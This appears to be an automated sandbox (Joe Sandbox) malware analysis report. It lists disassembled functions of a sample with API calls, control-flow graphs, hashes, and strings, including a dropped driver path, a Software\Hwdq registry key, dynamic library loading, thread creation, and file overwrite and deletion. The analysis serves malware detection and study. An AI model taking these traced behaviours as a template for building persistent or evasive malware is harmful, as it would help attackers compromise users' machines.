                                                                                                                                                                                                                                                                                            • Opcode ID: 5231963d5c956d207c35925de7ee2e774dddd74cec3f31780d6da0573fc64bc7
                                                                                                                                                                                                                                                                                            • Instruction ID: c8b1a85a667380f075b771899e2335db79210d2e2fd69166be1bc35857435471
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5231963d5c956d207c35925de7ee2e774dddd74cec3f31780d6da0573fc64bc7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 990281B5901218DBDB24DF64DC44FE9B778BB9C704F0842DAE619AB290DB729B84CF50
                                                                                                                                                                                                                                                                                            Function 01439EEA Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176libraryloadersleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0001D4C0), ref: 01439EFE
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001000), ref: 01439F0B
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(014327C0), ref: 01439F4D
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,014327D0), ref: 01439F6A
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,014327E0), ref: 01439F8E
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,014327F0), ref: 01439FB2
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 0143A14B
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressProc$Sleep$ExitLibraryLoadThreadUser
                                                                                                                                                                                                                                                                                            • String ID: C:\Windows\system32\drivers\qijmfn.sys
                                                                                                                                                                                                                                                                                            • API String ID: 3711489173-3413758758
                                                                                                                                                                                                                                                                                            • Opcode ID: b4a57a6333c3910053e0634496715e6625a54af301c03d071a27bbf27fd5fca0
                                                                                                                                                                                                                                                                                            • Instruction ID: 17e69bad09318094fb0880db03648d30691ffebfd2f5d19e92a549ca336f2b05
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4a57a6333c3910053e0634496715e6625a54af301c03d071a27bbf27fd5fca0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F561AFB9A44204EFEB30EFB5E849B5B37B4A79CB45F20451AEB0A932B8D7705544DF20
                                                                                                                                                                                                                                                                                            Function 0144392D Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 141sleeplibrarythreadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 995 144392d-1443967 call 1448060 998 1443968-144396f 995->998 999 1443971-144397c Sleep 998->999 1000 144397e-14439b5 lstrcpy LoadLibraryA 998->1000 999->998 1001 14439b7-14439ca GetProcAddress 1000->1001 1002 14439cf-14439d6 1000->1002 1001->1002 1003 1443a2c-1443a94 call 144377a CreateThread call 14341c6 CreateThread call 14341c6 Sleep 1002->1003 1004 14439d8-1443a12 FreeLibrary lstrcat LoadLibraryA 1002->1004 1012 1443ab0-1443ab7 1003->1012 1004->1003 1005 1443a14-1443a27 GetProcAddress 1004->1005 1005->1003 1013 1443ae7-1443b0c Sleep call 144174a * 2 1012->1013 1014 1443ab9-1443ae5 Sleep CreateThread call 14341c6 1012->1014 1022 1443b19-1443b20 1013->1022 1014->1012 1023 1443b22-1443b29 1022->1023 1024 1443b5e Sleep 1022->1024 1023->1024 1026 1443b2b-1443b32 1023->1026 1024->1022 1026->1024 1027 1443b34-1443b5b call 1434060 call 144195d 1026->1027 1027->1024
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001000), ref: 01443976
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,01432714), ref: 0144398B
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000), ref: 014439A2
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,01432700), ref: 014439C4
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 014439DF
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,014322B0), ref: 014439F2
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000), ref: 014439FF
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,01432700), ref: 01443A21
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00033062,00000000,00000000,00000000), ref: 01443A49
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,01441E9B,00000000,00000000,?), ref: 01443A70
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000400), ref: 01443A84
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000400), ref: 01443AAA
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00031CE3,0000005A,00000000,?), ref: 01443AD6
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000400), ref: 01443AEC
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000DBBA0), ref: 01443B13
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleep$CreateLibraryThread$AddressLoadProc$Freelstrcatlstrcpy
                                                                                                                                                                                                                                                                                            • String ID: Z
                                                                                                                                                                                                                                                                                            • API String ID: 4104366077-1505515367
                                                                                                                                                                                                                                                                                            • Opcode ID: c53e2028eb80493c675059eb35eb5f365d88ad5cc39109b24341702f77269725
                                                                                                                                                                                                                                                                                            • Instruction ID: a448993058485702f6cf294c25639c68f4da3f4a49cbfc13140d5c6f299a7db3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c53e2028eb80493c675059eb35eb5f365d88ad5cc39109b24341702f77269725
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A517CB9E40254ABF7319B60DC09BD67774BB1CB06F00819AF34AA62A4C7F05AC4CF61
                                                                                                                                                                                                                                                                                            Function 01434AF0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 162registrystringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 1032 1434af0-1434b59 call 1448060 1035 1434b60-1434bc9 lstrcpy lstrlen wsprintfA RegOpenKeyExA 1032->1035 1036 1434b5b 1032->1036 1038 1434bcb-1434be6 RegCreateKeyA 1035->1038 1039 1434bed-1434c0f 1035->1039 1037 1434d75-1434d79 1036->1037 1038->1039 1040 1434be8 1038->1040 1042 1434c15-1434c5a wsprintfA 1039->1042 1043 1434d68-1434d6f RegCloseKey 1039->1043 1040->1037 1044 1434c60-1434c66 1042->1044 1045 1434d0a-1434d11 1042->1045 1043->1037 1048 1434ce5-1434d04 call 1434a5b lstrcpy 1044->1048 1049 1434cae-1434cba 1044->1049 1050 1434c6d-1434c78 1044->1050 1051 1434c7d-1434c8b 1044->1051 1052 1434c8d-1434c9b 1044->1052 1053 1434c9d-1434cac 1044->1053 1054 1434cbc-1434ce3 call 1434a5b lstrcpy 1044->1054 1046 1434d13-1434d34 RegSetValueExA 1045->1046 1047 1434d36-1434d5d lstrlen RegSetValueExA 1045->1047 1056 1434d63 1046->1056 1047->1056 1048->1045 1049->1045 1050->1045 1051->1045 1052->1045 1053->1045 1054->1045
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,Software\Hwdq), ref: 01434B6C
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,\%d,616E6974), ref: 01434B90
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01434B9E
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 01434BC1
                                                                                                                                                                                                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 01434BDE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateOpenlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                            • String ID: Software\Hwdq$\%d$userC:\Windows\
                                                                                                                                                                                                                                                                                            • API String ID: 4004410694-1901203423
                                                                                                                                                                                                                                                                                            • Opcode ID: 554abcd1a30bf22333f9d4f5d9f41bc13e40ee4b36b45dd8977f109f74534ac9
                                                                                                                                                                                                                                                                                            • Instruction ID: 436e39a573e0b87887ff6171b1c581452ef31cf992b9ac88b2f347fbd51ce07d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 554abcd1a30bf22333f9d4f5d9f41bc13e40ee4b36b45dd8977f109f74534ac9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0618F75904218AFDB28CF64DC49BEABB74EB9C701F0480D9E709A7254D7B09AC5CF90
                                                                                                                                                                                                                                                                                            Function 014414D9 Relevance: 25.7, APIs: 17, Instructions: 172filestringmemoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 1060 14414d9-144152d CreateFileA 1061 1441536-1441582 GlobalAlloc ReadFile lstrlen call 1434527 1060->1061 1062 144152f-1441531 1060->1062 1065 1441587-1441597 1061->1065 1063 1441746-1441749 1062->1063 1066 1441730-1441734 1065->1066 1067 144159d-14415c9 lstrlen call 14347bb 1065->1067 1068 1441736-144173a GlobalFree 1066->1068 1069 1441740 1066->1069 1067->1066 1072 14415cf-14415d9 1067->1072 1068->1069 1069->1063 1073 14415ed-14415fc 1072->1073 1074 1441641-14416b6 SetFilePointer WriteFile SetFilePointer SetEndOfFile CloseHandle 1073->1074 1075 14415fe-144163f lstrlen call 14342ec call 14343c5 1073->1075 1077 14416c4-14416c8 1074->1077 1078 14416b8-14416c2 1074->1078 1075->1073 1081 14416d4-14416e3 DeleteFileA 1077->1081 1082 14416ca-14416ce GlobalFree 1077->1082 1078->1077 1080 14416e5-144172a call 1434631 Sleep CreateThread call 14341c6 Sleep 1078->1080 1080->1066 1081->1063 1082->1081
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 0144151A
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 01441542
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 01441563
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(014121A4), ref: 0144156E
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(014121A4), ref: 014415A2
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(01432654,?), ref: 0144160C
                                                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0144164E
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 01441672
                                                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0144168D
                                                                                                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(?), ref: 0144169A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$lstrlen$Pointer$AllocCreateGlobalReadWrite
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3635920088-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d5216fe7dd22966f3e161ec1fbd0b6c5b714319afe65d0db2059c88293f962f3
                                                                                                                                                                                                                                                                                            • Instruction ID: 5d61e9315269f5ab948f86957a79365c4e5f689a97c64b9aeca857ccb886599f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5216fe7dd22966f3e161ec1fbd0b6c5b714319afe65d0db2059c88293f962f3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE613375A00218EBDB24DFA4DD49FDEB774AB58B01F108185F709A7294D7B4AB80CF91
                                                                                                                                                                                                                                                                                            Function 01436330 Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 408memorystringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 1090 1436330-14363d7 call 1448060 RtlEnterCriticalSection 1093 143672a-143672e 1090->1093 1094 14363dd-1436410 call 144772b 1090->1094 1095 1436734-1436749 IsBadWritePtr 1093->1095 1096 143695b-1436980 RtlLeaveCriticalSection 1093->1096 1102 1436412 1094->1102 1103 1436417-143645f 1094->1103 1095->1096 1099 143674f-1436758 1095->1099 1099->1096 1101 143675e-1436767 1099->1101 1101->1096 1104 143676d-1436788 call 1434145 1101->1104 1105 1436461 1103->1105 1106 1436466-1436494 call 144772b 1103->1106 1104->1096 1113 143678e-14367f8 wsprintfA lstrlen call 14342ec call 14343c5 1104->1113 1111 14364c7 1106->1111 1112 1436496-14364a5 1106->1112 1112->1111 1114 14364a7-14364b4 1112->1114 1113->1096 1125 14367fe-143680d 1113->1125 1114->1111 1116 14364b6-14364c5 1114->1116 1116->1111 1118 14364cc-14364db 1116->1118 1120 14364e2-14364ef 1118->1120 1121 14364dd 1118->1121 1123 14364f1-1436500 1120->1123 1124 1436507-14365a6 call 144772b * 4 call 14347bb 1120->1124 1123->1124 1126 1436502 1123->1126 1149 14365a8 1124->1149 1150 14365ad-14365b7 1124->1150 1125->1096 1127 1436813-143681d 1125->1127 1127->1096 1129 1436823-143684a call 14347bb 1127->1129 1129->1096 1135 1436850-1436866 1129->1135 1137 1436875-14368b1 GlobalAlloc call 144772b 1135->1137 1138 1436868-143686f GlobalFree 1135->1138 1144 14368b3-14368b9 GlobalFree 1137->1144 1145 14368bf-1436958 GlobalAlloc wsprintfA lstrlen call 14342ec call 14343c5 call 144772b call 14354a2 1137->1145 1138->1137 1144->1145 1145->1096 1152 14365c8-14365da 1150->1152 1155 14365e0-14365ec 1152->1155 1156 1436698-143669f 1152->1156 1160 14365fd-143660e 1155->1160 1157 14366a1-143696e 1156->1157 1158 14366a6-143671d call 144772b * 2 call 1434af0 1156->1158 1157->1096 1180 1436722-1436725 1158->1180 1164 1436623-1436657 lstrcpy 1160->1164 1165 1436610-143661f 1160->1165 1166 1436687-1436693 1164->1166 1167 1436659-1436663 1164->1167 1165->1164 1170 1436621 1165->1170 1166->1152 1167->1166 1172 1436665-143666f 1167->1172 1170->1160 1172->1166 1176 1436671-143667b 1172->1176 1176->1166 1178 143667d 1176->1178 1178->1166 1180->1096
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RtlEnterCriticalSection.NTDLL(01449050), ref: 014363CD
                                                                                                                                                                                                                                                                                            • IsBadWritePtr.KERNEL32(?,-00000008), ref: 01436741
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 014367A0
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 014367B7
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0143686F
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 01436883
                                                                                                                                                                                                                                                                                            • RtlLeaveCriticalSection.NTDLL(01449050), ref: 01436960
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CriticalGlobalSection$AllocEnterFreeLeaveWritelstrlenwsprintf
                                                                                                                                                                                                                                                                                            • String ID: purity_control_%x$purity_control_%x
                                                                                                                                                                                                                                                                                            • API String ID: 2588801185-2962537068
                                                                                                                                                                                                                                                                                            • Opcode ID: 29e00684a9520dd8bde079204b997868207176a8f3ce8c07ec7fd2daf639ae66
                                                                                                                                                                                                                                                                                            • Instruction ID: 09e2ea9813b30c4a409338e3a83654349e5020e37dd9303bef7f3f6a5e6e1593
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29e00684a9520dd8bde079204b997868207176a8f3ce8c07ec7fd2daf639ae66
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA028171904219ABDB24CF14CC90FEA7776BFD9344F0481A9E6499B364D732AB91CF90
                                                                                                                                                                                                                                                                                            Function 01435760 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 247registrystringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 1181 1435760-14357e1 1182 14357e3-14357ea 1181->1182 1183 14357ec 1181->1183 1182->1183 1184 14357f1-1435825 lstrcpy RegOpenKeyExA 1182->1184 1185 1435c01-1435c05 1183->1185 1186 1435827-143582b 1184->1186 1187 1435854-1435858 1184->1187 1188 1435832-143584d RegCreateKeyA 1186->1188 1189 143582d 1186->1189 1190 1435a4b-1435a89 1187->1190 1191 143585e-1435868 1187->1191 1188->1187 1193 143584f 1188->1193 1189->1185 1197 1435beb-1435bf2 1190->1197 1198 1435a8f-1435a99 1190->1198 1194 1435872-143589e RegEnumValueA 1191->1194 1193->1185 1195 14358a0-14358a9 1194->1195 1196 14358d4-143590b 1194->1196 1199 14358ab 1195->1199 1200 14358ad-14358d2 RegDeleteValueA 1195->1200 1204 1435911-1435923 1196->1204 1205 1435a46 1196->1205 1197->1185 1202 1435bf4-1435bfb RegCloseKey 1197->1202 1198->1197 1203 1435a9f-1435aca 1198->1203 1199->1196 1200->1194 1202->1185 1209 1435ad0-1435b35 wsprintfA RegQueryValueExA 1203->1209 1210 1435bd9-1435bdf 1203->1210 1207 1435935 1204->1207 1208 1435925-1435933 1204->1208 1205->1197 1207->1205 1208->1207 1211 143593a-1435944 1208->1211 1212 1435b37-1435b41 1209->1212 1213 1435b46-1435b82 1209->1213 1210->1197 1214 1435955-143595c 1211->1214 1212->1210 1215 1435bd4 1213->1215 1216 1435b84-1435b8a 1213->1216 1217 1435962-14359ae wsprintfA 1214->1217 1218 1435a41 1214->1218 1215->1210 1219 1435b91-1435b9f 1216->1219 1220 1435ba1-1435bb2 1216->1220 1221 1435bc5-1435bd1 1216->1221 1222 1435bb4-1435bc3 1216->1222 1223 1435a01-1435a3c RegSetValueExA 1217->1223 1224 14359b0-14359b6 1217->1224 1218->1205 1219->1215 1220->1215 1221->1215 1222->1215 1225 1435946-143594f 1223->1225 1224->1219 1224->1220 1224->1221 1224->1222 1226 14359f2-14359fb 1224->1226 1227 14359e1-14359f0 1224->1227 1228 14359bd-14359cb 1224->1228 1229 14359cd-14359df 1224->1229 1225->1214 1226->1223 1227->1223 1228->1223 1229->1223
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,Software\Hwdq), ref: 014357FD
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 0143581D
                                                                                                                                                                                                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 01435845
                                                                                                                                                                                                                                                                                            • RegEnumValueA.KERNEL32(00000000,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 01435896
                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 01435BFB
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseCreateEnumOpenValuelstrcpy
                                                                                                                                                                                                                                                                                            • String ID: %c%d_%d$%c%d_%d$Software\Hwdq$userC:\Windows\
                                                                                                                                                                                                                                                                                            • API String ID: 4133318789-168572953
                                                                                                                                                                                                                                                                                            • Opcode ID: 799ca4b2612067faabf29ecfc141e94f1d288156026532b6058e392a42438688
                                                                                                                                                                                                                                                                                            • Instruction ID: 29a0594a25528c37fd766696fe85a1576c1fc416f5dd520cdc7f0bec0d5efa00
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 799ca4b2612067faabf29ecfc141e94f1d288156026532b6058e392a42438688
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3C109B4904228DBDB24DF54DD88BE9B7B5BB9C304F1082DAD509AB2A0D7749BC5CF90
                                                                                                                                                                                                                                                                                            Function 01444567 Relevance: 22.6, APIs: 15, Instructions: 143threadsleepnetworkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00008002), ref: 0144457F
                                                                                                                                                                                                                                                                                            • WSAStartup.WS2_32(00000002,?), ref: 0144458E
                                                                                                                                                                                                                                                                                            • RtlInitializeCriticalSection.NTDLL(01449030), ref: 01444599
                                                                                                                                                                                                                                                                                            • RtlInitializeCriticalSection.NTDLL(01449018), ref: 014445A4
                                                                                                                                                                                                                                                                                            • RtlInitializeCriticalSection.NTDLL(01449050), ref: 014445AF
                                                                                                                                                                                                                                                                                              • Part of subcall function 01443B60: LoadLibraryA.KERNEL32(01432154), ref: 01443C13
                                                                                                                                                                                                                                                                                              • Part of subcall function 01443B60: GetProcAddress.KERNEL32(00000000,0143278C), ref: 01443C36
                                                                                                                                                                                                                                                                                              • Part of subcall function 01443B60: GetProcAddress.KERNEL32(00000000,014327A0), ref: 01443C4E
                                                                                                                                                                                                                                                                                              • Part of subcall function 01443B60: GetProcAddress.KERNEL32(00000000,014327B0), ref: 01443C67
                                                                                                                                                                                                                                                                                              • Part of subcall function 01443B60: LoadLibraryA.KERNEL32(01432894), ref: 01443C79
                                                                                                                                                                                                                                                                                              • Part of subcall function 01443B60: GetProcAddress.KERNEL32(00000000,014328D8), ref: 01443C9C
                                                                                                                                                                                                                                                                                              • Part of subcall function 01443B60: GetProcAddress.KERNEL32(00000000,014328B0), ref: 01443CB5
                                                                                                                                                                                                                                                                                              • Part of subcall function 01443B60: GetProcAddress.KERNEL32(00000000,014328C4), ref: 01443CCD
                                                                                                                                                                                                                                                                                              • Part of subcall function 01443B60: GetProcAddress.KERNEL32(00000000,014328A0), ref: 01443CE6
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000327D4,00000000,00000000,00000000), ref: 014445D2
